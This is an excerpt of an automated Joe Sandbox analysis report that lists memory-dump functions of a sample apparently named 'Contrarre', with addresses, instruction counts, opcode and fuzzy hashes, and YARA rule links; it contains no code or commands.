Instruction ID: 8f7881b9fe695758614b795853db37fd22d9eeea776955e6dde143cd7ef6c353
Opcode Fuzzy Hash: 8e526f73534d2e160067c937ff5667929cd806c2ab9ee341275a51be2f90dfda
Instruction Fuzzy Hash: FC73F531D1075A8EDB11EF68C844A99FBB1FF99304F14C6DAE44867221EB70AAD4CF42

Function 014619B8 Relevance: .9, Instructions: 862COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997a781b26947bf0b4f2c147eaee9f8b6f50d83266c5027bab25c567da4d7d86
Instruction ID: 6d6104738b287f3cae6e3d76f1d710ce962fe34c99aa762c2eb973925a1c4d61
Opcode Fuzzy Hash: 997a781b26947bf0b4f2c147eaee9f8b6f50d83266c5027bab25c567da4d7d86
Instruction Fuzzy Hash: 59625C7145C3628FC7A1CF68C4A22EBB7F2EF92238714989EC8D646552E3315993CB81

Function 01462DD1 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2092dab50cdd36bf173ba1458e3c00ec80b235402345f0c3925d3430f050ab39
Instruction ID: 0c7484ff480b847bde2897dc8b6a22048617aab7c27f3effe2f05273fa5fcacb
Opcode Fuzzy Hash: 2092dab50cdd36bf173ba1458e3c00ec80b235402345f0c3925d3430f050ab39
Instruction Fuzzy Hash: 5191C374B003589FDB28DF78945467EBBB7BFC8704B14892EE506E7398DE3588428792

Function 01469480 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d8ea2183dde7725d3d62a01e6eed636f4e37d6d98c7daf1470cbc677639a72
Instruction ID: eaf997dce3cd1f501997ad265fce104b32c7acc502066f7b2e17e34739c41a38
Opcode Fuzzy Hash: 54d8ea2183dde7725d3d62a01e6eed636f4e37d6d98c7daf1470cbc677639a72
Instruction Fuzzy Hash: 77C1D374E00218CFEB64DFA5D994B9DBBB2BF88304F1081AAD809A7365DB355E85CF11

Function 0146C521 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a787789b9a5f77628821771fa096bd715c14058bc452edd3b5054f644e12d55
Instruction ID: 9cb9410a4532c7c68d7362ce16c836d39a074048799e373eca77c8d38c1ae3e1
Opcode Fuzzy Hash: 4a787789b9a5f77628821771fa096bd715c14058bc452edd3b5054f644e12d55
Instruction Fuzzy Hash: A2A1F471D0061A8FDB10DFA9C88479DFBB5BF89304F14C2AAE458A7261EB709A85CF41

Function 01469A30 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7595e534c0bf8c36b56e54023a52f73345723e347e8febd393b57b40d5a47690
Instruction ID: 44cf41abbd47f08730e8939dadf68928e76037c56a9358657a572504e5360b04
Opcode Fuzzy Hash: 7595e534c0bf8c36b56e54023a52f73345723e347e8febd393b57b40d5a47690
Instruction Fuzzy Hash: FDA1F570D00208CFEB24DFA9D588B9DBBB1FF88304F24826AD409AB3A5DB755985CF55

Function 01469A40 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f03548f82c15db0a0387fa3fad3c5fbe1de2eec817f5bf5e19c09aaa9db0a7
Instruction ID: 933835a97b906a2b3a64124e956f205e0f2623923dd5e18db489e9349d309268
Opcode Fuzzy Hash: 38f03548f82c15db0a0387fa3fad3c5fbe1de2eec817f5bf5e19c09aaa9db0a7
Instruction Fuzzy Hash: 51A11770D00208CFEB24DFA9C98479DBBB1FF88304F24826AD409A73A5DB755985CF55

Function 01469D87 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ba33ac3ed6a638277253373d352dc04ca697be0e4fbf41e33be4e0afb46d05
Instruction ID: 06343d258899310c3bc22e40debf1609b4bacdcbf7d1a1d9aabffd46602866ad
Opcode Fuzzy Hash: 14ba33ac3ed6a638277253373d352dc04ca697be0e4fbf41e33be4e0afb46d05
Instruction Fuzzy Hash: 4491F770D00208CFEB20DFA8D98479DBBB5FF49318F24826AE409A73A5D7759985CF15

Function 0146946F Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818672eaf75c74d9239403a5af1de91316e7bfff78e8fa9e6b07a78f95ebfde2
Instruction ID: 6f8e1109ebd93d152b786d52e2bbfa87f862c2198869e39ae8a8b4d79f0c2d3d
Opcode Fuzzy Hash: 818672eaf75c74d9239403a5af1de91316e7bfff78e8fa9e6b07a78f95ebfde2
Instruction Fuzzy Hash: 6241E574D00248CFEB18CFAAD85469DBBF6BF88304F24C12AC415AB269DB755945CF51

Function 0146AD3D Relevance: 1.8, Strings: 1, Instructions: 521COMMON

Download Yara Rule

Strings

, xrefs: 0146B015

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e3967a27d7bd86df00b658d95fd0d4ec3d40a481ec2c5bd1fefb18de4683b039
Instruction ID: ba8313e6ba97e79152b6726af2fa16c60d58b1791b0e7b4db493f0c0cfb8b021
Opcode Fuzzy Hash: e3967a27d7bd86df00b658d95fd0d4ec3d40a481ec2c5bd1fefb18de4683b039
Instruction Fuzzy Hash: 1681C830B042009FDB259F78D85856E7FA6FF89369B14456BE515CB3E1DB348D02CB92

Function 0146AF78 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

, xrefs: 0146B065

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7998772ac0a1bf0dbb36d9ac870aef6e7b8bacb558b3bde2c3ce593fbcbb2458
Instruction ID: b175f2a574a4735e9eaca9e244ae750a45269f842e2d26960302333e24ffcc63
Opcode Fuzzy Hash: 7998772ac0a1bf0dbb36d9ac870aef6e7b8bacb558b3bde2c3ce593fbcbb2458
Instruction Fuzzy Hash: A8B1E730704204DFDB25AF78A85866E7BA6FF89368B14462BE515CB3E1CB358D06CB53

Function 0146B500 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452d6c381de036f496d4f1f37c85fc2bdc263e85453304d020328e52885def4f
Instruction ID: f3a94753257f62647d75b7260111371808226905b7910d674addd9f7aee5933f
Opcode Fuzzy Hash: 452d6c381de036f496d4f1f37c85fc2bdc263e85453304d020328e52885def4f
Instruction Fuzzy Hash: AAE1F930B042048FDB15DB6CD890AAE7BB6FF89324F14456AE505DB3B1DA35DC42CB92

Function 0146BF80 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f0ca9e32331cd0ddd1dd7de4d111325be84a0e591f66d8e62d6111cd83587f
Instruction ID: 1484fbdded3cdb0409cd5084eaa3440a9817ec32ccf65a88114b3e2fa70a32ff
Opcode Fuzzy Hash: e6f0ca9e32331cd0ddd1dd7de4d111325be84a0e591f66d8e62d6111cd83587f
Instruction Fuzzy Hash: 1961C671B003059FD714DFBDD8849ABBBB9EFC9328B14852BE559D7360D631D8018BA1

Function 01460B20 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27121343519e73dd382985d80d6a53df6c28980355e0ef1b2643173cf0e0f6f6
Instruction ID: 24c4d0ba9c64c3f1a9e0a7726f1cc02e1c8306bd3094b60b6bc426e4f73296f8
Opcode Fuzzy Hash: 27121343519e73dd382985d80d6a53df6c28980355e0ef1b2643173cf0e0f6f6
Instruction Fuzzy Hash: BCA13D74A0035ACFDF55EFA9E88499DBBB1FF98304B104629D405AB369DB34AD05CF81

Function 01460B30 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d019222fb8457297892897b9829db2121f9d4cb1979f8909cf01f277bfb5cf
Instruction ID: 6054a2431e98357aad6efca9a07cd5d7b6f0e5118ab2ba87b8653802838d22c1
Opcode Fuzzy Hash: b4d019222fb8457297892897b9829db2121f9d4cb1979f8909cf01f277bfb5cf
Instruction Fuzzy Hash: B9A12E74A0035ACFDF55EFA9E88499DBBB2FF58304B104629D405AB369DB34AD05CF81

Function 0146BC28 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1ece59420cbf964eb861939f724243bd0910c7c000c250028aed1ca7269073c
Instruction ID: e23197f9101db358399b794916e5fcda593db18147f5464bd8ae04603b6ea541
Opcode Fuzzy Hash: a1ece59420cbf964eb861939f724243bd0910c7c000c250028aed1ca7269073c
Instruction Fuzzy Hash: ED41D431B002059FCB14EBB9D855A6E7FBAEF89205F1444BEE509CB365DE348D02C792

Function 01463F78 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894e6f32a8432a1152df168ec74ae81d9ba7e51ab020060bdd80d69a32ee5ada
Instruction ID: 2bfe8fd9897ab0114a3bdff491e187f237ba72b19e697f3538b206440df5a544
Opcode Fuzzy Hash: 894e6f32a8432a1152df168ec74ae81d9ba7e51ab020060bdd80d69a32ee5ada
Instruction Fuzzy Hash: 7151D574E00218DFDB58DFA9D484AADBBF2BF89314F14842AE815BB364DB349942CF11

Function 01462C78 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51869f28e68ab7f1dc583f1ad31fda52190bcadb1c453a0b49798ff43a1093c
Instruction ID: f7eb47e81db820366c8d0964192bd0c106883570b3708006bcbdc9ddc0f30cf0
Opcode Fuzzy Hash: e51869f28e68ab7f1dc583f1ad31fda52190bcadb1c453a0b49798ff43a1093c
Instruction Fuzzy Hash: 54312831B003256BEF294A699894B7F7BAABBD4308F14403BD902C73A5DBF48C068752

Function 01463158 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023997f021b063e98babf55cf10022b105b8f281cebabd6cc9efe4b56f2c898c
Instruction ID: 17393904a729aa04a481aed24a37b76cb7c006aaf15f9599bf93f85dac2da6ef
Opcode Fuzzy Hash: 023997f021b063e98babf55cf10022b105b8f281cebabd6cc9efe4b56f2c898c
Instruction Fuzzy Hash: 3F4106B4E01209DFDB58DFAAD88499DBBF2BF99314F24812AE405BB364DB305842CF11

Function 01463168 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2df36a963da5b7449503f1576c398eb2162d8bddd6d38b99cc14064a0b7a6e6
Instruction ID: 5eb6fe91d7b42992e3b2f7b89a4e9df82d8c058b85b1862ea81fcbedc869c252
Opcode Fuzzy Hash: a2df36a963da5b7449503f1576c398eb2162d8bddd6d38b99cc14064a0b7a6e6
Instruction Fuzzy Hash: 4241F674E01248CFDB58DFAAD48499DBBF6BF89304F24852AE805BB364DB30A841CF11

Function 01469249 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1efa97df18f1d5c72c2f14a17a32df780b268be66462782147f7e3b1297826cd
Instruction ID: 39f098a40157473b6b65fc66771fbea301c11aba94afcf48d23e70378e13ada1
Opcode Fuzzy Hash: 1efa97df18f1d5c72c2f14a17a32df780b268be66462782147f7e3b1297826cd
Instruction Fuzzy Hash: 7831CB3042634A8FD2212F21B9EC17ABBB0FF4F3A77447C41E06E81529EBB046898F51

Function 0146B869 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5cdcc9ee2e8b8815dfdb7d073382427988e242d4ef44cbd4c2ec95c998e829
Instruction ID: 394ce1823d5380ba46bcacd0a91374cd2ea4e7bae4bb5039e47510b5c71c8b3d
Opcode Fuzzy Hash: 2e5cdcc9ee2e8b8815dfdb7d073382427988e242d4ef44cbd4c2ec95c998e829
Instruction Fuzzy Hash: BF312835B002088FDB05DBA8C480E9EBBB6FF88224F155555E505EB371DA71EC468F92

Function 0146B89D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac7797f6a4e92c55bd1ee0648298f471188c4a2733a4c964c2ab98a55b3964c
Instruction ID: a904446cb946731cc8f74348574e2df7893bb8f8d21ec531e28b76d73522eb30
Opcode Fuzzy Hash: 9ac7797f6a4e92c55bd1ee0648298f471188c4a2733a4c964c2ab98a55b3964c
Instruction Fuzzy Hash: 84313935B002088FDB45DBA8C880E9EBBB6FF88324F155555E505EB371DA71EC468F92

Function 0146BDE8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458f4fd149ea223470e0fd26cad0f48b43f2fab5a0ff7c87fa1a3650a5be0b9e
Instruction ID: 1d7a6b6dfe31600a1d06becc75ff25574d2d1ec08f89f8688d3fdcac96913877
Opcode Fuzzy Hash: 458f4fd149ea223470e0fd26cad0f48b43f2fab5a0ff7c87fa1a3650a5be0b9e
Instruction Fuzzy Hash: BE31E6307042049FC715DF79D894A6E7BBAFF89314B24816AE506CB762CF319D02CB92

Function 0141D006 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612258854.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_141d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0417e7c9d0c572ae851286db6824b5b9bf144c9d5edaaccf3f63ec47274cc529
Instruction ID: 22a89dad79e20461bf9be0b9a4e11dab34b1b5370d7ac3d8ed8ef02d01d66e4b
Opcode Fuzzy Hash: 0417e7c9d0c572ae851286db6824b5b9bf144c9d5edaaccf3f63ec47274cc529
Instruction Fuzzy Hash: 3C316DB550D3C49FCB17CF64C894711BF71AB46214F29C5DBD9898F2A7C23A980ACB62

Function 014618C8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2c0afa9f4ad6e6bb6323f9110ae5fed50dc8e211841a985751ba6d1d991201
Instruction ID: cd2f999e86ba4daed0d5f768a7ded365efc34054caff37d2d0b038772b20b28e
Opcode Fuzzy Hash: ee2c0afa9f4ad6e6bb6323f9110ae5fed50dc8e211841a985751ba6d1d991201
Instruction Fuzzy Hash: B421B031A001159FCB14DF68C4409BF3BA9FBD9764B20C56AD91A9B350DB30EE0ACBC2

Function 0141D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612258854.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_141d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec00fa0689604d390a112f6ee43c8a9350fffacf78c63dc06637be0713daaf7b
Instruction ID: 1838dbf6bcabe0ed25cc233007b49d10e38f90d6d6d83690f7985b8ecf69e535
Opcode Fuzzy Hash: ec00fa0689604d390a112f6ee43c8a9350fffacf78c63dc06637be0713daaf7b
Instruction Fuzzy Hash: CB2125F1904244DFDB15DF54D984B26BF65EB84318F20C56ED80A4B3AAC336D447CA62

Function 01460EC8 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66503f181a4f297743d0b2583b551af765a00480c4fe288df1d4315396d6aba4
Instruction ID: 57574678023fd8f1773c8b3a9ae586d56ef4ab57798eaa6e333039b585d77da9
Opcode Fuzzy Hash: 66503f181a4f297743d0b2583b551af765a00480c4fe288df1d4315396d6aba4
Instruction Fuzzy Hash: 63218170A40219DFDB09EFA9C4142AEBBB6EF84308F10C56B94099B365CB788946DF42

Function 014617B8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e88bbbc82de0377814030db750f50f7c70d05ddf6331241528cbe7098594e9
Instruction ID: fd03c1ed177218fe6b4301c03ab8d7839350b92488ab42f92c55db5e7490f29c
Opcode Fuzzy Hash: 43e88bbbc82de0377814030db750f50f7c70d05ddf6331241528cbe7098594e9
Instruction Fuzzy Hash: B6211470D0524ACFCB51DFA8D8455EEBFF4BF4A314F0441AAD405BB225EB305A89CBA1

Function 0146BB48 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 453e386ac1af0122154864bef5883fe8ca2c523b1c39c99f5a2b5d2775ca4021
Instruction ID: 6e9b358e31d698aaa862a1c64b0ca896b566df0ae96e11ad7be944cc9c18feb2
Opcode Fuzzy Hash: 453e386ac1af0122154864bef5883fe8ca2c523b1c39c99f5a2b5d2775ca4021
Instruction Fuzzy Hash: 9F118C353002048FD724DB69D984A56B7EAFF89B25B10807AE24ACB776CA71EC04CB51

Function 01464850 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74e019ee9f8b5214d27b65db87c5f298bdc5c552e4eb89e1fd62335d5a1febc2
Instruction ID: c99714158925144b7da1652291b2717cb0dc4c34b19e4c4b60a2077a3eff2326
Opcode Fuzzy Hash: 74e019ee9f8b5214d27b65db87c5f298bdc5c552e4eb89e1fd62335d5a1febc2
Instruction Fuzzy Hash: E701F132B003004FEB249BBD985457F2BEBAFC8224319853AC905CB3A5FE30CC018B51

Function 01464860 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a194e4bee188e738cf012017f1ee0db786b060c4fd60eeab7efe0a269b8235a
Instruction ID: dc663b41bfa0a277df8030c7e51945b7789ce3720c33623183d5bf99be85b3d7
Opcode Fuzzy Hash: 8a194e4bee188e738cf012017f1ee0db786b060c4fd60eeab7efe0a269b8235a
Instruction Fuzzy Hash: 4901AD36B002144FEB24ABBE985453F7ADBBFC4624315443AD909CB729FE70CC018B91

Function 0146BB46 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e3b92500bb0ec9374868f56e67aabab28c2082ed2746afdbd35750a7d2e176
Instruction ID: a89fd3b2992c938c03efff7275e83530e875587f42877e9bf6fc4ef62d82282d
Opcode Fuzzy Hash: 89e3b92500bb0ec9374868f56e67aabab28c2082ed2746afdbd35750a7d2e176
Instruction Fuzzy Hash: EF015E313002009FD724DB69D984B56B7E9FF89B29F11807AE149CB776CA71EC04CB52

Function 0146A508 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a7fbf01aa46906c6628c4cbc0b682970ad4f32e929d12ffbc8fa262104bdc2
Instruction ID: 912d1796bad64547a6cd65e0b27304b2e4b7d9ee0723b1990e0c14b756452ce2
Opcode Fuzzy Hash: 68a7fbf01aa46906c6628c4cbc0b682970ad4f32e929d12ffbc8fa262104bdc2
Instruction Fuzzy Hash: 08015E75E002099FDF64DF69D8885AE7FB9FF88350B10442AE91A93350DB309E11CBA2

Function 0146A4F9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0a32726a715438635a2b1f2b422578773547d1e8d87c8344d00a78ccc22e60
Instruction ID: 2b30c7cef097640863e0f504faeb54d7385a62ceb2f2d22d6639bc0559be4ce7
Opcode Fuzzy Hash: ae0a32726a715438635a2b1f2b422578773547d1e8d87c8344d00a78ccc22e60
Instruction Fuzzy Hash: 11017171A002199FCB20DF68D8449AF7FB5FF89314B10412AF91993360D7304A11CBA2

Function 0146BEF8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d15eddca396a5c6f93dcfaccd61ea158cb217317e536457fbc1c910e52ae6c9
Instruction ID: 29d977c8945a614e5c4b49f7306afd436a0064064894a5f61e28fdc1e73ccf34
Opcode Fuzzy Hash: 3d15eddca396a5c6f93dcfaccd61ea158cb217317e536457fbc1c910e52ae6c9
Instruction Fuzzy Hash: 0F017D317083408FCB292B74A42806E7FE6EFCA221714046BF206CB3A2DB358C42CB52

Function 0146C1B0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508f106c68dd16886e4957254fee237618a3517f51a021b326094cd3a43cf431
Instruction ID: 73b925cc87be4bf85cb66e8328835d386369492af0accefcae7c574a335b9abb
Opcode Fuzzy Hash: 508f106c68dd16886e4957254fee237618a3517f51a021b326094cd3a43cf431
Instruction Fuzzy Hash: CDF0A032B006119BCB29566EE4549AEB7AEDFC5635714007BE509DB360CF32DC028B91

Function 0146B9EC Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2612601136.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1460000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dffb55936698c373529a34e5bb603da578df38b5d5d2c288bacca7dd4396113
Instruction ID: 3c68a501ef753968a5f5d1f81bb2329f1543c134a4e25f62636c3b1e4614d89c
Opcode Fuzzy Hash: 1dffb55936698c373529a34e5bb603da578df38b5d5d2c288bacca7dd4396113
Instruction Fuzzy Hash: A6F0F071A01208AF8B50DFBA98409AFBBF9FB98250B14413AE108D3211E670A9068BE1

Function 0146B9F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

